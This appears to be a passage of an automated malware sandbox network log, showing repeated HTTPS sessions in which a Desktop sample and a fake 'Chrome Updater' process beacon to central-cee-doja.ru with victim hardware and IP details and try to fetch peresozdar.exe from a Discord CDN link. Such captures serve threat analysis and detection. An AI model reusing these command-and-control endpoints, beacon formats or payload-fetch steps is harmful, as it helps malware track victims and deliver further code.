                                                                                    2024-01-04 07:31:53 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    261192.168.2.649987104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:53 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:53 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=vFa8jLnkeOuobq4Y529kUMqcCdlN4g2E7TaFOwyThQ9ZtXmHhkFqOttuPiYpi3ooDfsZenRngiulX3MsukihWx6ViSkLa1MSP8ursyyHNDYUAV%2B%2FGn13nssdsxOzxBnR1irWNMyP"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8d28a439c31-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:53 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    262192.168.2.649988104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:53 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:53 UTC582INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:53 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mRkT0Dg067jiW%2FthcKH%2F1y%2FdsIGPBQ2xgJZAuzWuUoZmbiu%2Fd4ppN2p0QlEhSiycNU1wDc7L%2BR4uLzIwLBHb5NKPzk2V%2FBKZFnaMpimT3rq0PE9wdwr9l5rCwHElKcX1c55e4qRV"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8d3cd54587e-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:53 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    263192.168.2.649989162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:54 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:54 UTC1340INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:54 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8d7ee157fae-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 76
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:54 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=y89ICSfsVuz5eshIBsTSEHZEJZiMQh82rOINeIF0S.4-1704353514-1-AfoxCXqV5z62QYwXyK1O2w5wVs2sDx0fc1tNwDAWfoVMBNUEas0F7cskRvUqMU7xXs1zEUrXt7D7pCV7uAkI3YI=; path=/; expires=Thu, 04-Jan-24 08:01:54 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=1hVQxMG6KvckiLFmg6mQjNx7BOl4dw4nyvt%2FWecYrt26n1c2ldkXWGnA6atr2holonY7lRyvSkpAz%2FmK0GHgl3iRaocr5x9WwZrW5tU%2Be33DEKZzMVyrrYDjgQ97xVjhb6uxpg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=nBoQFiyzRz2K70WG3uMkn9XbM.WL0reZBRQaFNLuu_M-1704353514260-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:54 UTC236INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    264192.168.2.649990104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:54 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:54 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:54 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fg9uCT35eOW2L%2BgS8zpHufjvJWwPtMdTpCpSJlymXCUt1z4qpF0OY1rlK3fqURN72ehWK%2BWvK88rtO3PyrevK450ZBdeviXd0cp1KJuhDBsI3is7IOQgw3H9hbgOdDM34zZywyS6"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8d86bb02d1f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:54 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:54 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    265192.168.2.649991104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:54 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:55 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6wq5TfIoHjNsBzCAgci%2FadSIZaWdD%2FixglCXFJmKGhWq5mGWwPIUBclTqMsl7A%2FpeMqx9gXsh%2FKKEfEEfTCA3VItEmOuRTAHQxq1G2Zk43XohnenmKpn2AAYiitpbnGV3dk55wOQ"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8db9f0f387c-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:55 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    266192.168.2.649992162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:54 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:55 UTC1335INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:55 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8ddee77082c-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 90
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:55 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=isGB3wqXer8YWozl0Yf30iSDh.kDWAjVATxrLQln75o-1704353515-1-AdWn+geWbqvisRwckOU6M+9bd+qldHobYvBzT/KMGFs3416Xiaf48NH6sXS7M3gEC1Nsg3Ns4fbXMiLZlbXeWiY=; path=/; expires=Thu, 04-Jan-24 08:01:55 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DF2qy928BXSTqDQfC0QYwZFKmuygtk4LSY7KqqKoI%2FoXjaHrye0hVh4Q3Q3FAuG%2FHNLMJEmIugqwrUrfjK6gGvPj90pYD0ce3Vu2l4Slvn1i%2FNrpaXIwMds3bEPi%2BZjxopzp6Q%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=AntLwAUL1CBH0o4ODgk4jFz1DjpRc.mWp3YYKerjViI-1704353515214-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:55 UTC34INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-
                                                                                    2024-01-04 07:31:55 UTC202INData Raw: 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: 8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    267192.168.2.649993104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:55 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:55 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:55 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=o1RAKecU3t5n5YBwP4ullmrKPWU5Dy5RficfdZQnmbPS83OKQnvuIm7ormadLCJQV153Ub1TGCSfw2SpvUQJ5KJ%2B6CEfCy1ao3VPnwi8XMcvg%2B0m5Y9yydrbAgcyyFACVsCW12nx"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8e13f832060-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:55 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    268192.168.2.649994104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:55 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:56 UTC580INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2TOmuJkRSXX6zHb%2FSfmouPzqCSSpr2L3us44YGzk%2F36g5%2B0Kmnf1Edaq1X2U%2FvWpDbfHB8lBAwLDYzYdXbV0waYz7pTQZ%2BdUKNyjAYvMqaRdOQ179RljrWcIGkbDEKUKP6QzpPNj"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8e18f799c5a-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:56 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:31:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    269192.168.2.649995162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:56 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:56 UTC1342INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:56 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8e55e468018-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 78
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:56 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=lTgSGsoZWbS.2RBH7sWkb8STsyAFc8a2TW.dJUU9aT8-1704353516-1-AfqLijJiOePrLF0KeqWvKD+r9uKxNAzhFy4yps/evUdvOU+5KS1l9rEZ1t5jcUYnkN2RFGcnVaiOd2ajjj0TknA=; path=/; expires=Thu, 04-Jan-24 08:01:56 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ov7azeOcTnZTHCyyE6SyfEKIpNrdJ4RWx384OdMoziVt%2FFmGrDIZPM19gqXFqLwWTmlYIvEkvo19KU0UsRRXjG4xwm0MLuyAoIoSneai6%2F2MBQOy2A%2FIML%2BYHluPA339EtIuGQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=aoVAy4Q9hsL9gSbY42CTStRZCY__wDA_BjCCoRc.MgM-1704353516412-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:56 UTC27INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e
                                                                                    Data Ascii: <?xml version='1.0' encodin
                                                                                    2024-01-04 07:31:56 UTC209INData Raw: 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: g='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    270192.168.2.649996104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:56 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:31:56 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:31:56 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uNNxtNLhbggoKwGWoQ2p%2FvuCHVDsH%2BaVI6urPJvzYuBGpm2ltA0S0PNvcdxXN4Tj5R4lf0VhD3%2BsuawTJz05qTkySFvEjR7ibz2APxx5ypwWkBc6PsUHWonuEnhnPCf17phdhTbN"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c8e5cd302027-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:31:56 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:31:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    271192.168.2.649997162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:31:57 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:31:57 UTC1336INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:31:57 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c8ec2d087ffd-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 79
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:31:57 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqURQ2RkFvfQOod70WCLX2ErgeFYAiUncDxuJocma8vmDwPeeQBu9xIipew02g4qpq12Sby-B46mw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=CGCwx1svuAh4Nigjr56H1AV7Fr634tQnpuHmLCPnjpA-1704353517-1-AbfiF4AFpCma5uuHGwRofCRRehEELNl0JnCh6WObeQ6Bt38ljBeOuCsHWuO0Tf+2hhej6qmcgsL/U8lH9WqMyQo=; path=/; expires=Thu, 04-Jan-24 08:01:57 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GuHW7PSP9RkfYEytPvGI3a6GTXt7vqwq3J6NwdDfv0y7VzPbZeN41XeG9hH%2BMb36uUYkwbKVMPF8kbOTGYehds12FvJDe6g0gfKr0w533VyDGwz24FC1uRnjynFtgBfrIb6JyA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=EEYy.t5GruCiNMwgnFLu8BvmOUj3GKNkR80S6ZhhTbU-1704353517498-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:31:57 UTC33INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF
